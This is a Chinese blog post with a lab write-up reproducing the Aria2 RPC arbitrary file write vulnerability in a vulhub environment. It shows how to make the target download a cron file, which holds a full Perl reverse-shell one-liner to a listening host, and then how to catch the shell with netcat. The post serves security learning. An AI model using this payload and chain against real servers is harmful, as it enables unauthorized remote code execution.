Aria2 任意文件写入漏洞

最新推荐文章于 2024-05-23 11:53:29 发布
最新推荐文章于 2024-05-23 11:53:29 发布
阅读量444 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/117064712
版权

漏洞背景

Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞。

漏洞复现

我这里是vulhub的环境,环境启动后,访问http://your-ip:6800/,发现服务已启动并且返回404页面。
因为rpc通信需要使用json或者xml,不太方便,所以我们可以借助第三方UI来和目标通信,如 http://binux.github.io/yaaw/demo/
在这里插入图片描述
在settings里面填上url,我也没用过这个东西,原本还以为需要穿透才能用,很奇迹的是内网也行
在这里插入图片描述
保存后点击add
在这里插入图片描述
在这里插入图片描述
选择了文件后发现报错了,我又没用过这种东西,看了看别人博客,这一步格式是http网址,应该是要从网站上拉取下载
使用python在shell文件目录下搭一个http

  1. python2 -m SimpleHTTPServer 8000
  2. python3 -m http.server 8000

在这里插入图片描述
然后将网址填上点add就可以拉取了
shell文件内容:(注意后面要有\n换行,不然会失败)

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.168.30.128";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

使用nc来监听,稍微等待就可以拿到shell
在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
aria2.conf 配置文件
02-05
aria2.conf 配置文件
Aria2打造属于自己的下载神器
weixin_33901926的博客
06-12 1081
请关注微信公众号(
vulhub靶场——Aria2任意文件写入漏洞复现
ad12456的博客
05-16 1003
0:前期准备: 靶机(CentOS7,IP:192.168.96.222),攻击机(kali ,IP:192.168.96.226) 安装靶场Vulhub,前面有写过步骤。 先了解aria2Aria2是一个命令行下运行,多协议,多来源下载工具(HTTP /HTTPS,FTP,BitTorrent,Metalink),内建XML-RPC用户界面。Aria提供RPC服务器,通过--enable-rpc参数启动.Aria2的RPC服务器可以方便的添加,删除下载项目。 通过控制文件下载链接,文件储存路径以
vulhub——Aria2、bash、catic
最新发布
qq_55202378的博客
05-23 996
在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,其中safe.cgi是最新版bash生成的页面,victim.cgi是bash4.3生成的页面。
Aria2任意文件写入漏洞 漏洞复现
ADummy的博客
02-22 583
Aria2任意文件写入漏洞 by ADummy 0x00利用路线 ​ 第三方UI与目标进行通信—>搭建http服务器—>让目标下载恶意文件—>定时任务执行—>反弹shell 0x01漏洞介绍 ​ Aria2是一个轻量级,多协议,多源下载工具(支持HTTP / HTTPS,FTP,BitTorrent,Metalink),内置XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞
Aria2 任意文件写入漏洞复现
HEAVEN569的博客
02-14 1324
Aria2 任意文件写入漏洞 1.aria2介绍 Aria2是一个命令行下运行,多协议,多来源下载工具(HTTP / HTTPS,FTP,BitTorrent,Metalink),内建XML-RPC用户界面。Aria提供RPC服务器,通过--enable-rpc参数启动.Aria2的RPC服务器可以方便的添加,删除下载项目。 2.漏洞描述 RCE漏洞,可以让攻击通过控制文件下载链接,文件储存路径以及文件名,直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。同时通过Aria2提供的其他功
08 - vulhub - Aria2 任意文件写入漏洞
易编橙 · 终身成长社群,相遇已是上上签!
10-18 755
Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建`XML-RPC`和`JSON-RPC`接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞
Aria2 for Chrome-2.1.4.zip
12-27
名称:Aria2 for Chrome ---------------------------------------- 版本:2.1.4 作者:Alex Hua 分类:实用工具 ---------------------------------------- 概述:让Aria2无缝接管下载,加速下载体验,内建Aria2...
Aria2 20211207一键启动.zip
01-05
这个压缩包中的"Aria2 20211207一键启动"很可能是包含了Aria2win的安装或运行文件,以及必要的配置脚本或者批处理文件,使得用户可以轻松启动Aria2服务。 Aria2的主要特点包括: 1. **多线程下载**:Aria2可以同时...
C#封装Aria2c类库接口,大文件下载断点续传,速度快稳定.rar
10-06
FlyVR.Aria2.Aria2cRuntime.Load(new FlyVR.Aria2.Aria2cSettings() { Aria2Args = "", Aria2Host = "localhost", Aria2Path = "aria2c.exe(aria2c的路径)", Aria2Port = 6800 }); FlyVR.Aria2.Aria2c faa = new ...
window 64位 aria2服务端
02-05
只有一个文件名为 "aria2",这可能是指Aria2的可执行文件,或者是一个包含Aria2配置文件、启动脚本等的目录。通常,安装或运行Aria2时,用户需要解压这个文件,然后运行其中的可执行文件,并可能需要根据需求配置...
Aria2任意文件写入漏洞
浅笑996的博客
11-26 1778
Aria2 Aria2是一个轻量级,多协议,多源下载工具(支持HTTP / HTTPS,FTP,BitTorrent,Metalink),内置XML-RPC和JSON-RPC接口。 环境搭建 启动漏洞环境: cd vulhub-master/aria2/rce/ sudo docker-compose up 6800是aria2的RPC服务的默认端口,环境启动后,访问 http://your...
vulhub漏洞复现系列之aria2任意文件写入漏洞
weixin_43071873的博客
12-08 746
我的天,这个漏洞的复现,你看了我的博客之后你再说不会复现我揍你我跟你讲!(狗头保命) 工具介绍: Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞漏洞描述: 通过控制文件下载链接,文件储存路径以及文件名,可以实现任意文件写入。同时通过Aria2提供的其他功能,诸
08 - vulhub - Aria2 任意文件写入漏洞,美团面试在线编程
m0_58397123的博客
04-16 1035
第二次的 test 文件我是借了朋友的VPS,在他的VPS上利用python临时模拟了一个服务器,将 定时任务文件放在临时服务器的目录下,执行下载操作,并开启了 7777 端口监听。书籍的好处就在于权威和体系健全,刚开始学习的时候你可以只看视频或者听某个人讲课,但等你学完之后,你觉得你掌握了,这时候建议还是得去看一下书籍,看权威技术书籍也是每个程序员必经之路。光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。但是,我又想反弹,所以踩坑了…
【vulhub】Aria2 任意文件写入漏洞复现
qq_45300786的博客
09-13 250
就一个计划任务反弹shell,应该可以再计划任务,其他的一些任务。 看第一个就是了,最后2个只是补充了一点坑 https://blog.csdn.net/HEAVEN569/article/details/113804954 https://blog.csdn.net/qq_37043565/article/details/118300736 https://blog.csdn.net/qq_36374896/article/details/84191234 ...
aria2 配置文件
09-09
aria2 是一款轻量级的多线程下载工具,以下是一个简单的 aria2 配置文件示例: ``` # 文件名:aria2.conf # 设置 RPC 监听端口 rpc-listen-port=6800 # 设置 RPC 认证信息,用户名和密码 rpc-user=username rpc-...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值